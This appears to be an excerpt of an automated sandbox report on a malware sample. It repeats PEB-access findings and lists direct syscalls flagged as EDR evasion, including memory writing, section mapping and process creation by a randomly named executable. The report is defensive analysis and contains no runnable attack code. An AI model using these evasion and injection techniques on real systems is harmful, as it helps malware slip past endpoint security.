        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33941763 mov eax, dword ptr fs:[00000030h]3_2_33941763
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33941763 mov eax, dword ptr fs:[00000030h]3_2_33941763
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33941763 mov eax, dword ptr fs:[00000030h]3_2_33941763
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33941763 mov eax, dword ptr fs:[00000030h]3_2_33941763
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33941763 mov eax, dword ptr fs:[00000030h]3_2_33941763
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33908690 mov eax, dword ptr fs:[00000030h]3_2_33908690
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3398C691 mov eax, dword ptr fs:[00000030h]3_2_3398C691
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397D69D mov eax, dword ptr fs:[00000030h]3_2_3397D69D
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339BF68C mov eax, dword ptr fs:[00000030h]3_2_339BF68C
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339C86A8 mov eax, dword ptr fs:[00000030h]3_2_339C86A8
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339C86A8 mov eax, dword ptr fs:[00000030h]3_2_339C86A8
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392D6D0 mov eax, dword ptr fs:[00000030h]3_2_3392D6D0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339A86C2 mov eax, dword ptr fs:[00000030h]3_2_339A86C2
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339CA6C0 mov eax, dword ptr fs:[00000030h]3_2_339CA6C0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339006CF mov eax, dword ptr fs:[00000030h]3_2_339006CF
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397C6F2 mov eax, dword ptr fs:[00000030h]3_2_3397C6F2
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397C6F2 mov eax, dword ptr fs:[00000030h]3_2_3397C6F2
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338F96E0 mov eax, dword ptr fs:[00000030h]3_2_338F96E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338F96E0 mov eax, dword ptr fs:[00000030h]3_2_338F96E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390C6E0 mov eax, dword ptr fs:[00000030h]3_2_3390C6E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339056E0 mov eax, dword ptr fs:[00000030h]3_2_339056E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339056E0 mov eax, dword ptr fs:[00000030h]3_2_339056E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339056E0 mov eax, dword ptr fs:[00000030h]3_2_339056E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339266E0 mov eax, dword ptr fs:[00000030h]3_2_339266E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339266E0 mov eax, dword ptr fs:[00000030h]3_2_339266E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33993608 mov eax, dword ptr fs:[00000030h]3_2_33993608
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33993608 mov eax, dword ptr fs:[00000030h]3_2_33993608
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33993608 mov eax, dword ptr fs:[00000030h]3_2_33993608
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33993608 mov eax, dword ptr fs:[00000030h]3_2_33993608
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33993608 mov eax, dword ptr fs:[00000030h]3_2_33993608
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33993608 mov eax, dword ptr fs:[00000030h]3_2_33993608
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392D600 mov eax, dword ptr fs:[00000030h]3_2_3392D600
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392D600 mov eax, dword ptr fs:[00000030h]3_2_3392D600
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339BF607 mov eax, dword ptr fs:[00000030h]3_2_339BF607
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393360F mov eax, dword ptr fs:[00000030h]3_2_3393360F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339D4600 mov eax, dword ptr fs:[00000030h]3_2_339D4600
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33900630 mov eax, dword ptr fs:[00000030h]3_2_33900630
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33930630 mov eax, dword ptr fs:[00000030h]3_2_33930630
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33988633 mov esi, dword ptr fs:[00000030h]3_2_33988633
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33988633 mov eax, dword ptr fs:[00000030h]3_2_33988633
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33988633 mov eax, dword ptr fs:[00000030h]3_2_33988633
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393F63F mov eax, dword ptr fs:[00000030h]3_2_3393F63F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393F63F mov eax, dword ptr fs:[00000030h]3_2_3393F63F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33905622 mov eax, dword ptr fs:[00000030h]3_2_33905622
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33905622 mov eax, dword ptr fs:[00000030h]3_2_33905622
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33907623 mov eax, dword ptr fs:[00000030h]3_2_33907623
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393C620 mov eax, dword ptr fs:[00000030h]3_2_3393C620
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AD62C mov ecx, dword ptr fs:[00000030h]3_2_339AD62C
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AD62C mov ecx, dword ptr fs:[00000030h]3_2_339AD62C
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AD62C mov eax, dword ptr fs:[00000030h]3_2_339AD62C
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FD64A mov eax, dword ptr fs:[00000030h]3_2_338FD64A
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FD64A mov eax, dword ptr fs:[00000030h]3_2_338FD64A
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33935654 mov eax, dword ptr fs:[00000030h]3_2_33935654
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390965A mov eax, dword ptr fs:[00000030h]3_2_3390965A
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390965A mov eax, dword ptr fs:[00000030h]3_2_3390965A
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393265C mov eax, dword ptr fs:[00000030h]3_2_3393265C
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393265C mov ecx, dword ptr fs:[00000030h]3_2_3393265C
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393265C mov eax, dword ptr fs:[00000030h]3_2_3393265C
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33903640 mov eax, dword ptr fs:[00000030h]3_2_33903640
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3391F640 mov eax, dword ptr fs:[00000030h]3_2_3391F640
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3391F640 mov eax, dword ptr fs:[00000030h]3_2_3391F640
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3391F640 mov eax, dword ptr fs:[00000030h]3_2_3391F640
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393C640 mov eax, dword ptr fs:[00000030h]3_2_3393C640
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393C640 mov eax, dword ptr fs:[00000030h]3_2_3393C640
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33900670 mov eax, dword ptr fs:[00000030h]3_2_33900670
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942670 mov eax, dword ptr fs:[00000030h]3_2_33942670
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942670 mov eax, dword ptr fs:[00000030h]3_2_33942670
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338F7662 mov eax, dword ptr fs:[00000030h]3_2_338F7662
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338F7662 mov eax, dword ptr fs:[00000030h]3_2_338F7662
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338F7662 mov eax, dword ptr fs:[00000030h]3_2_338F7662
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33913660 mov eax, dword ptr fs:[00000030h]3_2_33913660
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33913660 mov eax, dword ptr fs:[00000030h]3_2_33913660
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33913660 mov eax, dword ptr fs:[00000030h]3_2_33913660
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393666D mov esi, dword ptr fs:[00000030h]3_2_3393666D
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393666D mov eax, dword ptr fs:[00000030h]3_2_3393666D
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393666D mov eax, dword ptr fs:[00000030h]3_2_3393666D
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33932594 mov eax, dword ptr fs:[00000030h]3_2_33932594
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3398C592 mov eax, dword ptr fs:[00000030h]3_2_3398C592
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393A580 mov eax, dword ptr fs:[00000030h]3_2_3393A580
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393A580 mov eax, dword ptr fs:[00000030h]3_2_3393A580
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33939580 mov eax, dword ptr fs:[00000030h]3_2_33939580
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33939580 mov eax, dword ptr fs:[00000030h]3_2_33939580
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339BF582 mov eax, dword ptr fs:[00000030h]3_2_339BF582
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397E588 mov eax, dword ptr fs:[00000030h]3_2_3397E588
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397E588 mov eax, dword ptr fs:[00000030h]3_2_3397E588
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339045B0 mov eax, dword ptr fs:[00000030h]3_2_339045B0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339045B0 mov eax, dword ptr fs:[00000030h]3_2_339045B0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339885AA mov eax, dword ptr fs:[00000030h]3_2_339885AA
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339365D0 mov eax, dword ptr fs:[00000030h]3_2_339365D0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF5C7 mov eax, dword ptr fs:[00000030h]3_2_338FF5C7
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF5C7 mov eax, dword ptr fs:[00000030h]3_2_338FF5C7
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF5C7 mov eax, dword ptr fs:[00000030h]3_2_338FF5C7
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF5C7 mov eax, dword ptr fs:[00000030h]3_2_338FF5C7
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF5C7 mov eax, dword ptr fs:[00000030h]3_2_338FF5C7
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF5C7 mov eax, dword ptr fs:[00000030h]3_2_338FF5C7
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF5C7 mov eax, dword ptr fs:[00000030h]3_2_338FF5C7
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF5C7 mov eax, dword ptr fs:[00000030h]3_2_338FF5C7
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF5C7 mov eax, dword ptr fs:[00000030h]3_2_338FF5C7
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393C5C6 mov eax, dword ptr fs:[00000030h]3_2_3393C5C6
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339805C6 mov eax, dword ptr fs:[00000030h]3_2_339805C6
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3398C5FC mov eax, dword ptr fs:[00000030h]3_2_3398C5FC
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390B5E0 mov eax, dword ptr fs:[00000030h]3_2_3390B5E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390B5E0 mov eax, dword ptr fs:[00000030h]3_2_3390B5E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390B5E0 mov eax, dword ptr fs:[00000030h]3_2_3390B5E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390B5E0 mov eax, dword ptr fs:[00000030h]3_2_3390B5E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390B5E0 mov eax, dword ptr fs:[00000030h]3_2_3390B5E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390B5E0 mov eax, dword ptr fs:[00000030h]3_2_3390B5E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393A5E7 mov ebx, dword ptr fs:[00000030h]3_2_3393A5E7
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393A5E7 mov eax, dword ptr fs:[00000030h]3_2_3393A5E7
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339315EF mov eax, dword ptr fs:[00000030h]3_2_339315EF
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AF51B mov eax, dword ptr fs:[00000030h]3_2_339AF51B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AF51B mov eax, dword ptr fs:[00000030h]3_2_339AF51B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AF51B mov eax, dword ptr fs:[00000030h]3_2_339AF51B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AF51B mov eax, dword ptr fs:[00000030h]3_2_339AF51B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AF51B mov eax, dword ptr fs:[00000030h]3_2_339AF51B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AF51B mov eax, dword ptr fs:[00000030h]3_2_339AF51B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AF51B mov ecx, dword ptr fs:[00000030h]3_2_339AF51B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AF51B mov ecx, dword ptr fs:[00000030h]3_2_339AF51B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AF51B mov eax, dword ptr fs:[00000030h]3_2_339AF51B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AF51B mov eax, dword ptr fs:[00000030h]3_2_339AF51B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AF51B mov eax, dword ptr fs:[00000030h]3_2_339AF51B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AF51B mov eax, dword ptr fs:[00000030h]3_2_339AF51B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AF51B mov eax, dword ptr fs:[00000030h]3_2_339AF51B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3398C51D mov eax, dword ptr fs:[00000030h]3_2_3398C51D
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33921514 mov eax, dword ptr fs:[00000030h]3_2_33921514
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33921514 mov eax, dword ptr fs:[00000030h]3_2_33921514
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33921514 mov eax, dword ptr fs:[00000030h]3_2_33921514
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33921514 mov eax, dword ptr fs:[00000030h]3_2_33921514
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33921514 mov eax, dword ptr fs:[00000030h]3_2_33921514
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33921514 mov eax, dword ptr fs:[00000030h]3_2_33921514
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FB502 mov eax, dword ptr fs:[00000030h]3_2_338FB502
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33902500 mov eax, dword ptr fs:[00000030h]3_2_33902500
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392E507 mov eax, dword ptr fs:[00000030h]3_2_3392E507
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392E507 mov eax, dword ptr fs:[00000030h]3_2_3392E507
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392E507 mov eax, dword ptr fs:[00000030h]3_2_3392E507
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392E507 mov eax, dword ptr fs:[00000030h]3_2_3392E507
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392E507 mov eax, dword ptr fs:[00000030h]3_2_3392E507
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392E507 mov eax, dword ptr fs:[00000030h]3_2_3392E507
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392E507 mov eax, dword ptr fs:[00000030h]3_2_3392E507

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtNotifyChangeKey: Direct from: 0x773F3B4CJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtWriteVirtualMemory: Direct from: 0x773F2D5CJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtMapViewOfSection: Direct from: 0x773F2C3CJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtAllocateVirtualMemory: Direct from: 0x773F2B1CJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtResumeThread: Direct from: 0x773F35CCJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtReadFile: Direct from: 0x773F29FCJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtQuerySystemInformation: Direct from: 0x773F2D1CJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtProtectVirtualMemory: Direct from: 0x773E7A4EJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtOpenFile: Direct from: 0x773F2CECJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtAllocateVirtualMemory: Direct from: 0x773F3BBCJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtQueryInformationToken: Direct from: 0x773F2BCCJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtReadVirtualMemory: Direct from: 0x773F2DACJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtSetInformationProcess: Direct from: 0x773F2B7CJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtQueryAttributesFile: Direct from: 0x773F2D8CJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtQueryVolumeInformationFile: Direct from: 0x773F2E4CJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtDeviceIoControlFile: Direct from: 0x773F2A0CJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtQuerySystemInformation: Direct from: 0x773F47ECJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtAllocateVirtualMemory: Direct from: 0x773F2B0CJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtOpenSection: Direct from: 0x773F2D2CJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtCreateFile: Direct from: 0x773F2F0CJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtDelayExecution: Direct from: 0x773F2CFCJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtOpenKeyEx: Direct from: 0x773F2ABCJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtSetInformationThread: Direct from: 0x773E6319Jump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtQueryInformationProcess: Direct from: 0x773F2B46Jump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtResumeThread: Direct from: 0x773F2EDCJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtCreateUserProcess: Direct from: 0x773F363CJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtProtectVirtualMemory: Direct from: 0x773F2EBCJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtWriteVirtualMemory: Direct from: 0x773F482CJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtAllocateVirtualMemory: Direct from: 0x773F480CJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtClose: Direct from: 0x773F2A8C
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtCreateKey: Direct from: 0x773F2B8CJump to behavior
